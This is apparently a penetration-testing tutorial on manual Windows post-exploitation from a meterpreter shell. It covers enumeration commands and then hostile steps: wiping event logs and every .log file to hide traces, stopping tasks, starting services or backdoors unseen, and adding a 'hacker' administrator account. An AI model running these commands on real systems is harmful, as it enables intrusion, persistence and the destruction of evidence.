Manual Post Exploitation on Windows PC (System Command)
This article is about Post Exploitation on the Victim’s System using the Windows Command Line. When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the knowledge of the Windows Command Line.
Requirement
Attacker: Kali Linux
TarObtain: Window PC
To execute this, we will first Obtain the meterpreter session of the Remote PC which you can learn from here. After gaining the session, escalate its privileged to Administrator which you can learn from here.
Now to access windows command line, type ‘shell’ in the meterpreter shell.
Let’s Start!!
Obtain User Details and its Privileges
After gaining the meterpreter shell or windows command line, before doing any work. It is important to know the current user. This command is usually used to verify that the account that we were trying to access is the one we got. This can be simply done using the command whoami.
To increase our reach, we will an option in “whoami” command:
[/all]: To show all the details about the user.
Example: whoami /all
As seen below we have username, SID and local group details
We also Obtain details about the privileges that are enabled or disabled to the user we are currently logged on.
Obtain the System Info
This command helps us enumerate lots of information regarding the system like hostname, domain, time zone and much more.
Example: systeminfo
We can sort the basic system details such as (Manufacturer, Build, and Model) of the victim’s System using findstr.
Example: systeminfo | findstr System
As shown in the below screenshot we have the Boot Time, Manufacturer, Model, Type, Directory and Language of the Victim’s System.
We can obtain the location (as close as the country) of victim’s System using systeminfo.
Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Time
As shown in the below screenshot we have the Time Zone (UTC+05:30), so we can say that the victim’s System is in “INDIA”.
Obtain Memory Details (Physical, Virtual, In Use, Free)
We can Obtain the basic memory details of the victim’s System using systeminfo.
Here we are using findstr with systeminfo to filter the systeminfo results.
Example: systeminfo | findstr Memory
As shown in the below screenshot we have the Total Physical Memory 3.5 GB out of which 1.6 GB is available, we are also Obtainting Virtual Memory Details.
Obtain the List System Drivers
We can display a list of all installed device drivers on the victim’s system and their properties through the command called driverquery.
Example: driverquery
Obtain the List of Kernel Drivers
We can the list of Kernel Drivers on the victim’s System using driverquery.
Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr Kernel
As seen below we have obtained a list of kernel drivers which can be used to get the direct exploits to the Victim’s System.
Obtain the List of File System Drivers
We can the list of File System Drivers on the victim’s System using driverquery.
Here we are using findstr with driverquery to filter the driverquery results.
Example: driverquery | findstr “File System”
Display Info about a Particular Service
We can obtain information about a particular service using sc command. Here we are using following options with sc command:
[query] to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv
Obtain the list of Active Tasks
We can obtain information about running tasks using tasklist command.
This command shows the name of the task running along with the Process ID (PID), Session Name, Session Number and Memory Usage.
Syntax: tasklist
We can sort the output of tasklist according to the modules using the following options of tasklist command:
[/m]: To specify the Modules in Tasklist
But we will have to mention the module which is to be used to sort the Tasklist.
Syntax: tasklist /m [Module Name]
Example: tasklist /m ntdll.dll
Here we can see all the tasks linked with ntdll.dll module.
Killing Tasks
We can kill tasks on the Victim’s System using a command called taskkill.
Taskkill requires either one of two things:
- Process Id
- Task Name
Here we are going to use [/f] option in taskkill, it enables the Taskkill to forcefully kill the tasks.
Killing the Tasks using the Process ID
Syntax: taskkill /f /pid [Process id of Task]
Example: taskkill f /pid 7236
Killing the Tasks using the Task Name
Syntax: taskkill /f /im “[Task Name]”
Example: taskkill /f /im “Taskmgr.exe”
Start or Stopping Services
We can start a service or some backdoor without the knowledge of the Victim using sc command.
Here we are using following options with sc command:
[start] to start a service.
Syntax:sc start [Service Name]
Example: sc start TeamViewer
As you can see in the below image the service has started.
We can also stop a service using sc command.Here we are using following options with sc command:
[stop] to start a service.
Syntax:sc stop [Service Name]
Example: sc stop TeamViewer
As you can see in the below image the process Stopped
List all the logs on the System
We can obtain a list of all the logs on a system using wevtutil command. Here we are using following options with wevtutil command:
[el] to List log names.
Example: wevtutil el
Clear a specific logon the System
We can clear a specific log on a system using wevtutil command. Here we are using following options with wevtutil command:
[cl] to List log names.
Syntax: wevtutil cl [log name]
Example: wevtutil cl System
Find all the Hard Disk/Storage Partitions on a System
While penetration testing a Remote PC, knowledge of all the Hard Disk or Storage Devices and Partitions is essential so that we can sweep all the partitions and Storage Devices in hope to find data of any particular importance.
This can be done using fsutil command. Here we are using following options with fsutil command:
[fsinfo] to view file system info.
[drives] to list all drives.
Example: fsutil fsinfo drives
As you can see below that the Victim System has 4 Hard Disk Partitions C, D, E and F
Delete all logs on a System
While penetration testing a remote pc, it is essential to remove the trace of youractivities, so we need to remove the evidence of our presence which can be found in log files.
The entire Log file has a .log extension so we are going to sweep the System Directory for files with extension .log and delete them with del command.
Note: Use this command with the path set to System Directory (In my case it is C:\)
Here we are using following options with del command:
[/a] to select files based on attributes.
[/s] to select System Files (/s is an attribute so it is to be used after /a)
[/q] to use Quiet Mode (It doesn’t ask if Ok to delete on global wildcards)
[/f] to force delete the read only files
Syntax:del [Directory]\*.log /a /s /q /f
Example: del \*.log /a /s /q /f
As you can see in the below screenshot the process of detecting and deleting the files with .log extension has started.
Manage Local Users
While penetration testing a remote PC, it is important to obtain the list of Local Users so that attacker can gain infomation about the various users assigned to that particular system.
This can be done using net command. Here we are using following options to be used with net command:
[-user] to display the list of local users
Example: net user
It is always advantageous to add a user in the Local Groups so that attacker can perform certain tasks on that system.
This can be done using net command. Here we are using following options with net command:
Syntax:net user [logon_name] [password] /add
Example: net user hacker pass123 /add
Many times, we come across a situation where we will have to perform certain administrative tasks, so we will add the user we created to the Administrative local group
Here we are using following options to be used with net command:
[-localgroup] to select the list of local groups
Syntax: net localgroup administrators [logon_name] /add
Example: net localgroup administrators hacker/add
In the above example, I have added a user in the local administrators group named as hacker. We can verify using the “net user” command
Now, during the clean-up process it is important to delete the local user created.
This can be done using net commandHere we are using following options with net command:
Syntax: net user [logon_name] /del
Example: net user hacker /del
Here you can see that I have used net command to add a user, making it a member of administrator local group and then deleting that user.
Display the List of all Scheduled Tasks
While penetration testing a remote PC, it is necessary to know the scheduled tasks to plan the attacks accordingly to further penetrate the Victim’s System. This can be done using schtasks.
We can sort schtasks so as to obtain a better readable format i.e. in a List Format.
Here we are using following options with schtasks command:
[/query]to display all scheduled tasks
[/fo] to specify the format of the Output (In this case we use List)
[/v] to use verbose mode
Example: schtasks /query /fo LIST /v
Author: Pavandeep Singh is an Ethical Hacker, Web Penetration Tester, Windows Command Line Expert and Researcher at hackingarticles.in. Contact here
Source: www.hackingarticles.in